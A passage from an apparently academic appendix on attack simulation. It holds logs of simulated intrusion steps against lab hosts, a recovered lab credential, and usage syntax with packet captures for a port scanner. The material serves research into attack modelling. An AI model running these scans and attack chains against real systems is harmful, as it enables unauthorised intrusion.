151 | CI | NS | Collection of additional information from DNS-server | Host Names | |
155 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | spiiran-erv.lan3.net |
156 | RE | CNS | Connection - null sessions | | |
157 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | lan2.net |
161 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | FTP-server |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | DNS-server |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS IIS |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | SNMP-agent |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS SQL Server 2000 |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | PWS |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | WINS-Server |
165 | ABE | FP | Connection to FTP server and examination of the prompt header | Running Applications | MS Remote Registry Service |
171 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows 2000 SP3 |
175 | CI | NS | Collection of additional information from DNS-server | Host Names | |
178 | CI | IST | Inquiry of system time | System Time | |
179 | CI | IST | Inquiry of system time | System Time | |
183 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | |
184 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
185 | RE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
186 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | lan2.net |
190 | UE | CNS | Connection - null sessions | | |
191 | UE | EUE | Enumerating Users with enum | Users ID and Psw | Admin |
191 | UE | EUE | Enumerating Users with enum | Users ID and Psw | RtYrw_!@ |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | SNMP-agent |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS Remote Registry Service |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
195 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | PWS |
200 | RCE | UDUM | Use of DumpSec | Running Applications | MS Remote Registry Service |
200 | RCE | UDUM | Use of DumpSec | Running Applications | MS IIS |
200 | RCE | UDUM | Use of DumpSec | Running Applications | MS SQL Server 2000 |
200 | RCE | UDUM | Use of DumpSec | Running Applications | DNS-server |
200 | RCE | UDUM | Use of DumpSec | Running Applications | SNMP-agent |
203 | RCE | UREG | Use of regdmp | Running Applications | DNS-server |
203 | RCE | UREG | Use of regdmp | Running Applications | SNMP-agent |
203 | RCE | UREG | Use of regdmp | Running Applications | PWS |
203 | RCE | UREG | Use of regdmp | Running Applications | MS SQL Server 2000 |
212 | EKV | UPWS | Usage of initial versions of MS PWS for gaining files contents and access to a host | | |
217 | GAR | CPF | Cracking of PWL File and access to a host | | |
224 | SPIH | SSIH | TCP SYN scan | IP-addresses | |
227 | SPIH | STIH | TCP connect scan | IP-addresses | |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 80 |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 21 |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 23 |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 8080 |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 137 |
233 | SPIS | SFB | Scanning FTP Bounce | Active Ports | 138 |
237 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows 2000 |
238 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows 2000 |
241 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
242 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows 2000 |
246 | CI | NS | Collection of additional information from DNS-server | Host Names | |
249 | CI | IST | Inquiry of system time | System Time | |
253 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | lan3.net |
254 | RE | EDNV | Enumerating NT/2000 Domains with net view | Domain Name | |
255 | RE | CNS | Connection - null sessions | Null Session | Connection was done successfully |
258 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\C |
258 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\D |
259 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\C |
260 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\C |
261 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\C |
261 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\D |
262 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\D |
262 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | \\spiiran-erv\C |
267 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | Admin |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | Mail-server |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | MS Remote Registry Service |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | MS SQL Server 2000 |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | PWS |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | SNMP-agent |
271 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | WINS-Server |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | PWS |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | DNS-server |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | Mail-server |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | FTP-server |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | MS Remote Registry Service |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | WINS-Server |
272 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | MS SQL Server 2000 |
278 | GAR | BFPG | Brute Force Password Guessing and access to a host | | |
286 | UFPS | FCA | Free Common Access Realization | | |
291 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows 2000 SP3 |
292 | IO | IDOS | Examination of response for DoS attacks | Operating System | Windows |
295 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
299 | CI | AM | Definition of the network adapter mask | Network Adapter Mask | 255.255.255.224 |
300 | CI | AM | Definition of the network adapter mask | Network Adapter Mask | 255.255.255.224 |
304 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | |
305 | RE | CNS | Connection - null sessions | | |
306 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | lan2.net |
310 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | |
313 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | |
314 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | Admin |
318 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
318 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
318 | ABE | TCBG | Telnet Connection Banner

Grabbing 

Running  Applications 

FTP -server 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  SQL  Server  2000 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

PWS 

318 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

SNMP -agent 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

WINS-Server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

PWS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  IIS 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

FTP -server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

Mail- server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

DNS-server 

321 

ABE 

TCBG 

Telnet  Connection  Banner 

Grabbing 

Running  Applications 

MS  Remote  Registry 
Service 

327 

IH 

DC 

Network  Ping  Sweeps 

IP -addresses 

: 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

332 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

8080 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

23 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

137 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

21 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

138 

333 

SPIS 

SFB 

Scanning  FTP  Bounce 

Active  Ports 

80 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

21 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

23 

336 

SPIS 

ST 

TCP  connect  scan 

Active  Ports 

137 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

80 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

21 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

23 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

8080 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

137 

339 

SPIS 

HS 

Half  scan 

Active  Ports 

138 

343 

IO 

IDOS 

Examination  of  response  for  DoS 
attacks 

Operating  System 

347 

Cl 

NS 

Collection  of  additional 
information  from  DNS- server 

Host  Names 

351 

RE 

EDC 

Enumerating  NT/2000  Domain 
Controllers  with  nltestl 

Domain  controllers 

spiiran  -erv.lan3.net 

352 

RE 

EDNV 

Enumerating  NT/2000  Domains 
with  net  view 

Domain  Name 

lan3.net 

353 

RE 

CNS 

Connection  -  null  sessions 

Null  Session 

Connection  was  done 
successfully 

356 

ENS 

NAT 

Enumerating  NetBIOS  Shares  with 
NetBIOS  Auditing  Tool 

Shared  Resources 

\\spiiran-erv\C 

356 

ENS 

NAT 

Enumerating  NetBIOS  Shares  with 
NetBIOS  Auditing  Tool 

Shared  Resources 

\\spiiran-erv\D 

359 

ENS 

NV 

Enumerating  NetBIOS  Shares  with 
net  view 

Shared  Resources 

\\spiiran-erv\C 

359 

ENS 

NV 

Enumerating  NetBIOS  Shares  with 
net  view 

Shared  Resources 

\\spiiran-erv\D 

364 

UE 

SNMPE 

SNMP  Enumeration  with  snmputil 
or  IP  N  etwork  Browser 

Users  ID  and  Psw 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

PWS 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

WINS-Server 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Running  Applications 

MS  SQL  Server  2000 
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368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  Remote  Registry 
Service 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

MS  IIS 

368 

ABE 

UNU 

Use  of  netcat  utility  for 

Applications  Enumeration 

Running  Applications 

Mail- server 

374 

GAR 

AAF 

Anonymity  Access  to  FTP-server 

Anonymous  Access  to 

Ftp -server  was  gained 
successfully 

375 

END 

ATTACK  IS  OVER  !!! 

A4.1.3. Total log of the realization of the intention CVR ("Confidentiality Violation Realization")

Conditions for the realization of the malefactor's intention:

•  protection degree of the network firewall is "None" (2);

•  protection degree of the attacked host firewall is "Strong" (1);

•  protection parameters of the attacked host are "Strong" (1);

•  degree of the hacker's knowledge about the network is "Good" (1).

The total log of the intention CVR realization is as follows:


No. | A | S | Description | ResultComment | Result | FailResult

1 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
2 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
5 | SPIH | STIH | TCP connect scan | IP-addresses | 192.168.130.135 | Forbidden Attack <STIH> blocked by Firewall <CVR_Personal_Firewall>
9 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
12 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
16 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
19 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
24 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
25 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
28 | IO | TS | Telnet Connection and SYST command execution | Operating System | |
31 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
32 | IO | IDOS | Examination of response for DoS attacks | Operating System | |
36 | CI | NS | Collection of additional information from DNS-server | Host Names | |
40 | RE | CNS | Connection - null sessions | | |
41 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | |
45 | UE | FUE | Finger Users Enumeration | Users ID and Psw | |
49 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
49 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
49 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
49 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
49 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
52 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | WINS-Server |
52 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | FTP-server |
52 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | Mail-server |
52 | ABE | UNU | Use of netcat utility for Applications Enumeration | Running Applications | DNS-server |
55 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
55 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
55 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
55 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
55 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
56 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
56 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
56 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
56 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
56 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
64 | SPIH | STIH | TCP connect scan | IP-addresses | 192.168.130.135 | Forbidden Attack <STIH> blocked by Firewall <CVR_Personal_Firewall>
69 | IO | TZ | Telnet connection and message header examination | Operating System | |
70 | IO | TZ | Telnet connection and message header examination | Operating System | |
71 | IO | TZ | Telnet connection and message header examination | Operating System | |
75 | CI | IST | Inquiry of system time | System Time | |
76 | CI | IST | Inquiry of system time | System Time | |
77 | CI | IST | Inquiry of system time | System Time | |
80 | CI | NS | Collection of additional information from DNS-server | Host Names | |
81 | CI | NS | Collection of additional information from DNS-server | Host Names | |
82 | CI | NS | Collection of additional information from DNS-server | Host Names | |
83 | CI | NS | Collection of additional information from DNS-server | Host Names | |
87 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | |
88 | RE | CNS | Connection - null sessions | | |
89 | RE | ERD | Enumerating NT/2000 Related Domains | Related Domains | |
92 | RE | SRE | Getting NFS by utility showmount | Shared Resources | |
96 | UE | CNS | Connection - null sessions | | |
97 | UE | EUE | Enumerating Users with enum | Users ID and Psw | |
100 | UE | CNS | Connection - null sessions | | |
101 | UE | PIUD | Providing Information about Users with DumpSec | Users ID and Psw | |
107 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
108 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
112 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
115 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
116 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
120 | RCE | UDUM | Use of DumpSec | Running Applications | Mail-server |
120 | RCE | UDUM | Use of DumpSec | Running Applications | DNS-server |
123 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
126 | RCE | UREG | Use of regdmp | Running Applications | | Forbidden Attack <UREG> blocked by Firewall <CVR_Personal_Firewall>
127 | RCE | UREG | Use of regdmp | Running Applications | | Forbidden Attack <UREG> blocked by Firewall <CVR_Personal_Firewall>
131 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
135 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
135 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
135 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
135 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
141 | GAR | BFPG | Brute Force Password Guessing and access to a host | | |
146 | CVR | RBV | Reading by Virus | | File(s) was (were) read |
151 | IO | IF | ICMP message quoting | Operating System | |
155 | CI | NS | Collection of additional information from DNS-server | Host Names | |
159 | RE | SRE | Getting NFS by utility showmount | Shared Resources | |
162 | RE | EDC | Enumerating NT/2000 Domain Controllers with nltest | Domain controllers | |
163 | RE | CNS | Connection - null sessions | | |
166 | ENS | NAT | Enumerating NetBIOS Shares with NetBIOS Auditing Tool | Shared Resources | |
169 | ENS | NAT | Enumerating NetBIOS Shares with NetBIOS Auditing Tool | Shared Resources | |
172 | ENS | NETD | Enumerating NetBIOS Shares with Netdom | Shared Resources | |
175 | ENS | DUMP | Enumerating NetBIOS Shares with DumpSec | Shared Resources | |
178 | ENS | NETV | Enumerating NetBIOS Shares with Netviewx | Shared Resources | |
183 | UE | FUE | Finger Users Enumeration | Users ID and Psw | |
189 | RCE | UDUM | Use of DumpSec | Running Applications | | Forbidden Attack <UDUM> blocked by Firewall <CVR_Personal_Firewall>
198 | SPIH | STIH | TCP connect scan | IP-addresses | 192.168.130.135 | Forbidden Attack <STIH> blocked by Firewall <CVR_Personal_Firewall>
199 | SPIH | STIH | TCP connect scan | IP-addresses | 192.168.130.135 | Forbidden Attack <STIH> blocked by Firewall <CVR_Personal_Firewall>
201 | | | | | |
203 | SPIH | SSIH | TCP SYN scan | IP-addresses | 192.168.130.135 |
204 | SPIH | SSIH | TCP SYN scan | IP-addresses | |
210 | SPIS | DHS | Dumb host scan | Active Ports | | Forbidden Attack <DHS> blocked by Firewall <CVR_Personal_Firewall>
211 | SPIS | DHS | Dumb host scan | Active Ports | | Forbidden Attack <DHS> blocked by Firewall <CVR_Personal_Firewall>
212 | SPIS | DHS | Dumb host scan | Active Ports | | Forbidden Attack <DHS> blocked by Firewall <CVR_Personal_Firewall>
216 | IO | RF | FIN Probe | Operating System | |
217 | IO | RF | FIN Probe | Operating System | |
221 | CI | NS | Collection of additional information from DNS-server | Host Names | |
224 | CI | NS | Collection of additional information from DNS-server | Host Names | |
225 | CI | NS | Collection of additional information from DNS-server | Host Names | |
229 | RE | SRE | Getting NFS by utility showmount | Shared Resources | |
233 | UE | FUE | Finger Users Enumeration | Users ID and Psw | |
237 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
237 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
237 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
243 | IH | DC | Network Ping Sweeps | IP-addresses | |
246 | IH | DC | Network Ping Sweeps | IP-addresses | 192.168.130.135 |
247 | IH | DC | Network Ping Sweeps | IP-addresses | 192.168.130.135 |
251 | IO | II | ISN sampling | Operating System | |
252 | IO | II | ISN sampling | Operating System | |
256 | CI | NS | Collection of additional information from DNS-server | Host Names | |
260 | RE | CNS | Connection - null sessions | | |
263 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
264 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
265 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
270 | UE | FUE | Finger Users Enumeration | Users ID and Psw | |
274 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
274 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
274 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
274 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
275 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | MS IIS |
275 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
285 | DS | SF | SYN flood (storm of inquiries on installation of TCP-connections) | | The SYN Flood Attack was performed successfully. The host was accessed |
286 | CSS | ABTH | Access on Behalf of Trusted Host to a host with SunOS v. 1.4.x | | |
289 | ACE | APF | Access to Password File | | |
290 | ACE | WDPF | Writing of user's identifier to Password File | | |
291 | ACE | MUID | Modification of user ID | | |
292 | ACE | MRF | Writing of IP-address of an attacked Host in the File .rhost | | |
293 | ACE | CC | Connection Closing | | |
294 | CSS | ATH | Access to a Target Host with Usage of the r-command rlogin | | |
297 | GAD | SCP | Search for Cleartext password | | |
300 | GAD | ETR | Evaluating Trust Relations | | |
306 | CVR | FRR | File(s) Reading Realization | | File(s) reading was executed |
309 | CBD | ISF | Infecting Startup Files | | Back doors were created |
312 | CBD | ISF | Infecting Startup Files | | Back doors were created |
315 | CBD | SBJ | Scheduling Batch Jobs | | |
318 | CBD | SBJ | Scheduling Batch Jobs | | |
322 | CT | CL | Clearing of Logs | | The logs were cleared |
325 | CT | CL | Clearing of Logs | | The logs were cleared |
333 | IBSD | EFE | External File Execution | | |
336 | GAD | SCP | Search for Cleartext password | | |
342 | CVR | FRR | File(s) Reading Realization | | File(s) reading was executed |
345 | CBD | SBJ | Scheduling Batch Jobs | | |
348 | CBD | SBJ | Scheduling Batch Jobs | | |
355 | PSA | TH | Password Stealing Attack by Implantation of Trojan Horse | | |
356 | PSA | MP | Mailing password and access to a host | | Access was done successfully, the password is |
359 | EP | UKE | Use of Known Exploit | | |
364 | CVR | FRR | File(s) Reading Realization | | File(s) reading was executed |
371 | IBSD | EFE | External File Execution | | |
374 | EP | PC | Password Cracking | | |
379 | CVR | FRR | File(s) Reading Realization | | File(s) reading was executed |
384 | IH | DC | Network Ping Sweeps | IP-addresses | |
388 | IO | IW | Watching of an initial size of the TCP window | Operating System | |
389 | IO | IW | Watching of an initial size of the TCP window | Operating System | Windows 2000 |
393 | CI | NS | Collection of additional information from DNS-server | Host Names | |
397 | RE | CNS | Connection - null sessions | | |
400 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
401 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
402 | ENS | SRVI | Enumerating NetBIOS Shares with Srvinfo -s | Shared Resources | |
407 | UE | SNMPE | SNMP Enumeration with snmputil or IP Network Browser | Users ID and Psw | |
411 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | WINS-Server |
411 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | FTP-server |
411 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | Mail-server |
411 | ABE | TCBG | Telnet Connection Banner Grabbing | Running Applications | DNS-server |
417 | GAR | AAF | Anonymous Access to FTP-server | | Anonymous Access to Ftp-server was gained successfully |
422 | CVR | RBV | Reading by Virus | | File(s) was (were) read |
425 | CBD | IMM | Installing Monitoring Mechanisms | | |
427 | END | | ATTACK IS OVER!!! | | |
A4.2. Logs of attack traces at the micro-level (network traffic level)

A4.2.1. Fragments of logs for the program scanports.exe execution

The program scanports.exe is intended for port scanning (SPIS).

Template for calling the program is as follows:

scanports.exe [scan type] -i number -h ip.ip.ip.ip.port -d ip.ip.ip.ip -p "ports" -t time

where

[scan type] is one of the following:

-sS - TCP SYN scan (half-open TCP connection);

-sT - TCP connect scan;

-sF - TCP FIN scan;

-sX - TCP Xmas Tree scan;

-sN - TCP NULL scan.

Other arguments are as follows:

number - number of the network interface ('Windump -D' can be used to list the installed interfaces);

ip.ip.ip.ip.port - source host IP-address and port;
ip.ip.ip.ip - destination host IP-address;

"ports" - list of ports to scan, for example, -p "10,20-100,1011";
time - timeout (in seconds) for waiting for a reply (optional parameter).

Let us assume that:

•  the malefactor's host IP-address is 192.168.130.136;

•  the malefactor's objective is to learn whether the ftp (port 21) and http (port 80) servers on 192.168.130.135 are listening.

Therefore, for a TCP connect scan the malefactor starts scanports.exe with the following arguments:
scanports.exe -sT -i2 -h 192.168.130.136.1050 -d 192.168.130.135 -p "21,80"

The fragment of log for port scan messages:

Starting scanports v.1.0
TCP connect scan.

192.168.130.136.1050->192.168.130.135.21 TCP connect: failed
Port is seems to be CLOSED.

192.168.130.136.1050->192.168.130.135.80 TCP connect: success
Port is seems to be OPEN.


The  fragment  of  log  for  port  scans  network  packets: 

17:49:39.688430  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:39.688609  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  3131284274  win  0 
17:49:40.165818  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:40.165986  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1  win  0 
17:49:40.666568  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  3131284273:3131284273(0)  win  64240 
17:49:40.666750  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1  win  0 

17:49:40.667878  IP  192.168.130.136.1050  >  192.168.130.135.80:  S  3131572065:3131572065(0)  win  64240 
17:49:40.668035  IP  192.168.130.135.80  >  192.168.130.136.1050:  S  1715932024:1715932024(0)  ack  3131572066  win  64240 

17:49:40.668084  IP  192.168.130.136.1050  >  192.168.130.135.80:  .  ack  1  win  64240 

17:49:40.668565  IP  192.168.130.136.1050  >  192.168.130.135.80:  F  1:1(0)  ack  1  win  64240 
17:49:40.668696  IP  192.168.130.135.80  >  192.168.130.136.1050:  .  ack  2  win  64240 
17:49:40.682920  IP  192.168.130.135.80  >  192.168.130.136.1050:  F  1:1(0)  ack  2  win  64240 
17:49:40.683021  IP  192.168.130.136.1050  >  192.168.130.135.80:  .  ack  2  win  64240 
In the first six rows we can see that the hacker's host tries three times to connect to 192.168.130.135.21. The server answers each of the hacker's SYN packets with a RST packet. Therefore, port 21 is closed.

In the next three rows the hacker's host sends a SYN packet to port 80, the server replies with a TCP SYN packet carrying the ACK flag, and the hacker's host acknowledges it. Therefore, port 80 is open.

The last four rows show the phase of closing the connection.

For a TCP SYN scan the malefactor starts scanports.exe with the following arguments:
scanports.exe -sS -i2 -h 192.168.130.136.1050 -d 192.168.130.135 -p "21,80"

The fragment of log for port scan messages:

Starting scanports v.1.0
TCP scanning by using SYN messages.

Selected device: Winbond W89C840(A) 100M PCI Adapter.

1. 192.168.130.136.1050->192.168.130.135.21 TCP SYN (seq: 12f79c ack: 0)
2. 192.168.130.135.21->192.168.130.136.1050 TCP RST ACK (seq: 0 ack: 12f79d)
Port 21 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.21 TCP RST ACK (seq: 12f79d ack: 1)

1. 192.168.130.136.1050->192.168.130.135.80 TCP SYN (seq: 12f79c ack: 0)
2. 192.168.130.135.80->192.168.130.136.1050 TCP SYN ACK (seq: 8dbbd4b7 ack: 12f79d)
Port 80 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.80 TCP RST ACK (seq: 12f79d ack: 8dbbd4b8)

The fragment of log for port scan network packets:

18:31:38.770016  IP  192.168.130.136.1050  >  192.168.130.135.21:  S  1243036:1243036(0)  win  1024 
18:31:38.770205  IP  192.168.130.135.21  >  192.168.130.136.1050:  R  0:0(0)  ack  1243037  win  0 
18:31:39.771821  IP  192.168.130.136.1050  >  192.168.130.135.21:  R  1:1(0)  ack  1  win  1024 
18:31:39.781351  IP  192.168.130.136.1050  >  192.168.130.135.80:  S  1243036:1243036(0)  win  1024 
18:31:39.781564  IP  192.168.130.135.80  >  192.168.130.136.1050:  S  2377897143:2377897143(0)  ack  1243037  win  64240 
18:31:39.781653  IP  192.168.130.136.1050  >  192.168.130.135.80:  R  1243037:1243037(0)  win  0 

